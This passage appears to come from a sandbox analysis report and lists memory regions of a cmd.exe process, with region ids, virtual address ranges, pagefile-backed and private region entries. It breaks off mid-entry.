Region: id = 17127 start_va = 0x4a9c0000 end_va = 0x4a9cffff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 17128 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 17129 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 17130 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 17131 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 17132 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 
region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 17133 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 17134 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 17135 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 17136 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 17137 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 17663 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 17664 start_va = 0x4a9c0000 end_va = 0x4a9cffff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 17665 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 17666 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 17667 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 17668 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 17669 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x0000000001980000" filename = "" Region: id = 17670 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 17671 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 17672 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 17673 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 17674 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 18052 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 18053 start_va = 0x4a9c0000 end_va = 0x4a9cffff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 18054 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 18055 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 18056 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 18057 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 18058 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" 
Region: id = 18059 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 18060 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 18061 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 18062 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 18063 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 18542 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 18543 start_va = 0x4a9c0000 end_va = 0x4a9cffff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 18544 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 18545 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 18546 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 18547 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 18548 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 18549 start_va = 0x1980000 
end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 18550 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 18551 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 18552 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 18553 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 19536 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 19537 start_va = 0x4a9c0000 end_va = 0x4a9cffff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 19538 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 19539 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 19540 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 19541 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 19542 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 19543 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 
region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 19544 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 19545 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 19546 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 19547 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 20060 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 20061 start_va = 0x4a9c0000 end_va = 0x4a9cffff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 20062 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 20063 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 20064 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 20065 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 20066 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 20067 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x0000000001980000" filename = "" Region: id = 20068 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 20069 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 20070 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 20071 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 20531 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 20532 start_va = 0x4a9c0000 end_va = 0x4a9cffff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 20533 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 20534 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 20535 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 20536 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 20537 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 20538 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" 
Region: id = 20539 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 20540 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 20541 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 20542 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 20873 start_va = 0x7ff60000 end_va = 0x7ffaffff entry_point = 0x0 region_type = private name = "private_0x000000007ff60000" filename = "" Region: id = 20874 start_va = 0x7ff10000 end_va = 0x7ff5ffff entry_point = 0x0 region_type = private name = "private_0x000000007ff10000" filename = "" Region: id = 20951 start_va = 0x7ff60000 end_va = 0x7ffaffff entry_point = 0x0 region_type = private name = "private_0x000000007ff60000" filename = "" Region: id = 20958 start_va = 0x7ff60000 end_va = 0x7ffaffff entry_point = 0x0 region_type = private name = "private_0x000000007ff60000" filename = "" Region: id = 20959 start_va = 0x7ff60000 end_va = 0x7ffaffff entry_point = 0x0 region_type = private name = "private_0x000000007ff60000" filename = "" Region: id = 22611 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 22612 start_va = 0x4a9c0000 end_va = 0x4a9cffff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 22613 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 22614 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 
region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 22615 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 22616 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 22617 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 22618 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 22619 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 22620 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 22621 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 22622 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 22744 start_va = 0x7ff60000 end_va = 0x7ffaffff entry_point = 0x0 region_type = private name = "private_0x000000007ff60000" filename = "" Region: id = 22745 start_va = 0x7ff60000 end_va = 0x7ffaffff entry_point = 0x0 region_type = private name = "private_0x000000007ff60000" filename = "" Region: id = 22758 start_va = 0x7ff60000 end_va = 0x7ffaffff entry_point = 0x0 region_type = private name = "private_0x000000007ff60000" filename = "" Region: id = 23838 start_va = 0x3f0000 end_va = 0x3fffff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 23839 start_va = 0x2180000 end_va = 
0x258ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002180000" filename = "" Region: id = 23840 start_va = 0x2590000 end_va = 0x299ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002590000" filename = "" Region: id = 23841 start_va = 0x19d0000 end_va = 0x19e5fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019d0000" filename = "" Region: id = 23842 start_va = 0x19d0000 end_va = 0x19e5fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019d0000" filename = "" Region: id = 23843 start_va = 0x19d0000 end_va = 0x19e5fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019d0000" filename = "" Region: id = 23844 start_va = 0x19d0000 end_va = 0x19e5fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019d0000" filename = "" Region: id = 23845 start_va = 0x19d0000 end_va = 0x19e5fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019d0000" filename = "" Region: id = 23846 start_va = 0x19d0000 end_va = 0x19e5fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019d0000" filename = "" Region: id = 23847 start_va = 0x19d0000 end_va = 0x19e5fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019d0000" filename = "" Region: id = 23848 start_va = 0x19d0000 end_va = 0x19e5fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019d0000" filename = "" Region: id = 23849 start_va = 0x19d0000 end_va = 0x19e5fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019d0000" filename = "" Region: id = 23850 start_va = 0x19d0000 end_va = 0x19e5fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019d0000" filename = "" Region: id = 23851 start_va = 0x19d0000 end_va = 0x19e5fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019d0000" filename 
= "" Region: id = 23852 start_va = 0x19d0000 end_va = 0x19e5fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019d0000" filename = "" Region: id = 23853 start_va = 0x19d0000 end_va = 0x19e5fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019d0000" filename = "" Region: id = 23854 start_va = 0x19d0000 end_va = 0x19e5fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019d0000" filename = "" Region: id = 23855 start_va = 0x19d0000 end_va = 0x19e5fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019d0000" filename = "" Region: id = 23856 start_va = 0x19d0000 end_va = 0x19e5fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019d0000" filename = "" Region: id = 23857 start_va = 0x19d0000 end_va = 0x19e5fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019d0000" filename = "" Region: id = 23858 start_va = 0x19d0000 end_va = 0x19e5fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019d0000" filename = "" Region: id = 23859 start_va = 0x19d0000 end_va = 0x19e5fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019d0000" filename = "" Region: id = 23860 start_va = 0x19d0000 end_va = 0x19e5fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019d0000" filename = "" Region: id = 23861 start_va = 0x19d0000 end_va = 0x19e5fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019d0000" filename = "" Region: id = 23862 start_va = 0x19d0000 end_va = 0x19e5fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019d0000" filename = "" Region: id = 23863 start_va = 0x19d0000 end_va = 0x19e5fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019d0000" filename = "" Region: id = 23864 start_va = 0x19d0000 end_va = 0x19e5fff entry_point = 0x0 region_type = 
pagefile_backed name = "pagefile_0x00000000019d0000" filename = "" Region: id = 23865 start_va = 0x19d0000 end_va = 0x19e5fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019d0000" filename = "" Region: id = 23866 start_va = 0x19d0000 end_va = 0x19e5fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019d0000" filename = "" Region: id = 23877 start_va = 0x19d0000 end_va = 0x19e5fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019d0000" filename = "" Region: id = 23878 start_va = 0x19d0000 end_va = 0x19e5fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019d0000" filename = "" Region: id = 23879 start_va = 0x19d0000 end_va = 0x19e5fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019d0000" filename = "" Region: id = 23880 start_va = 0x19d0000 end_va = 0x19e5fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019d0000" filename = "" Region: id = 23881 start_va = 0x19d0000 end_va = 0x19e5fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019d0000" filename = "" Region: id = 23882 start_va = 0x19d0000 end_va = 0x19e5fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019d0000" filename = "" Region: id = 23883 start_va = 0x19d0000 end_va = 0x19e5fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019d0000" filename = "" Region: id = 23884 start_va = 0x19d0000 end_va = 0x19e5fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019d0000" filename = "" Region: id = 23885 start_va = 0x19d0000 end_va = 0x19e5fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019d0000" filename = "" Region: id = 23886 start_va = 0x19d0000 end_va = 0x19e5fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019d0000" filename = "" Region: id = 23887 start_va = 
0x19d0000 end_va = 0x19e5fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019d0000" filename = "" Region: id = 23888 start_va = 0x19d0000 end_va = 0x19e5fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019d0000" filename = "" Region: id = 23889 start_va = 0x19d0000 end_va = 0x19e5fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019d0000" filename = "" Region: id = 23890 start_va = 0x19d0000 end_va = 0x19e5fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019d0000" filename = "" Region: id = 23891 start_va = 0x19d0000 end_va = 0x19e5fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019d0000" filename = "" Region: id = 23892 start_va = 0x19d0000 end_va = 0x19e5fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019d0000" filename = "" Region: id = 23893 start_va = 0x19d0000 end_va = 0x19e5fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019d0000" filename = "" Region: id = 23894 start_va = 0x19d0000 end_va = 0x19e5fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019d0000" filename = "" Region: id = 23895 start_va = 0x19d0000 end_va = 0x19e5fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019d0000" filename = "" Region: id = 23896 start_va = 0x19d0000 end_va = 0x19e5fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019d0000" filename = "" Region: id = 23897 start_va = 0x19d0000 end_va = 0x19e5fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019d0000" filename = "" Region: id = 23898 start_va = 0x19d0000 end_va = 0x19e5fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019d0000" filename = "" Region: id = 23899 start_va = 0x19d0000 end_va = 0x19e5fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x00000000019d0000" filename = "" Region: id = 23900 start_va = 0x19d0000 end_va = 0x19e5fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019d0000" filename = "" Region: id = 23901 start_va = 0x19d0000 end_va = 0x19e5fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019d0000" filename = "" Region: id = 23902 start_va = 0x19d0000 end_va = 0x19e5fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019d0000" filename = "" Region: id = 23903 start_va = 0x19d0000 end_va = 0x19e5fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019d0000" filename = "" Region: id = 23904 start_va = 0x19d0000 end_va = 0x19e5fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019d0000" filename = "" Region: id = 23905 start_va = 0x19d0000 end_va = 0x19e5fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019d0000" filename = "" Region: id = 23906 start_va = 0x19d0000 end_va = 0x19e5fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019d0000" filename = "" Region: id = 23907 start_va = 0x19d0000 end_va = 0x19e5fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019d0000" filename = "" Region: id = 23908 start_va = 0x19d0000 end_va = 0x19e5fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019d0000" filename = "" Region: id = 23909 start_va = 0x19d0000 end_va = 0x19e5fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019d0000" filename = "" Region: id = 23910 start_va = 0x19d0000 end_va = 0x19e5fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019d0000" filename = "" Region: id = 23945 start_va = 0x19d0000 end_va = 0x19e5fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019d0000" filename = "" Region: id = 23946 start_va = 0x19d0000 end_va = 0x19e5fff 
entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019d0000" filename = "" Region: id = 23947 start_va = 0x19d0000 end_va = 0x19e5fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019d0000" filename = "" Region: id = 23948 start_va = 0x19d0000 end_va = 0x19e5fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019d0000" filename = "" Region: id = 23949 start_va = 0x19d0000 end_va = 0x19e5fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019d0000" filename = "" Region: id = 24823 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 24824 start_va = 0x4a9c0000 end_va = 0x4a9cffff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 24825 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 24826 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 24827 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 24828 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 24829 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 24830 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 24831 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = 
pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 24832 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 24833 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 24834 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 28498 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 28499 start_va = 0x4a9c0000 end_va = 0x4a9cffff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 28503 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 28504 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 28505 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 28506 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 28507 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 28508 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 28509 start_va = 0x1980000 end_va = 0x1980fff entry_point = 0x0 region_type = pagefile_backed name = 
